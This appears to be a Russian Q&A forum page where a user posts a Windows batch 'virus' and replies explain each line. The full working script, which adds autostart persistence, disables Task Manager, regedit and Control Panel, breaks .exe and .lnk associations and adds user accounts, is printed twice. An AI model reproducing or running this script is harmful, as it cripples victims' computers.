@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
copy %0 %windir%\system32
copy %0 %windir%\system
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\fear.bat" /f >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cooler" /t REG_SZ /d "%SystemRoot%\system\fear.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label c: LOL YOU HACKED
label d: "ВАШ НИК" THE BEST
Другие языки программирования и технологии
Кто знает, поясните что делает такой бат вирус? (В описании)
он медленно убивает твой пк из нутри
Много чего нехорошего. Коротко говоря, полностью делает Windows нерабочей. Но это не вирус, а троян, рассчитанный на полного идиота ;)
P.S. Хорошо, подробнее.
@echo off - отключение вывода своих команд на экран
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul - смена местами кнопок мыши
copy %0 %windir%\system32 - копирование себя в папку system32
copy %0 %windir%\system - копирование себя в папку system
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\fear.bat" /f >nul - внесение своего автозапуска в реестр
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cooler" /t REG_SZ /d "%SystemRoot%\system\fear.bat" /f >nul - дублирование того же в другом месте реестра
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul - отключение Панели управления
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul - отключение редактора реестра
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul - что-то с запуском Explorer
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul - запрещение запуска Диспетчера задач
assoc .lnk=.txt >nul - замена вызовов ярлыков на текстовые файлы
assoc .exe=.mp3 >nul - замена вызовов программ на аудиофайлы
net user "Idiot you Hacked" /add >nul - добавление учетных записей пользователей с оскорбительными названиями
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label c: LOL YOU HACKED - переименование дисков к издевательским названиям
label d: "ВАШ НИК" THE BEST
P.S. Хорошо, подробнее.
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
label d: "ВАШ НИК" THE BEST
Была такая же проблема, юзай mwfix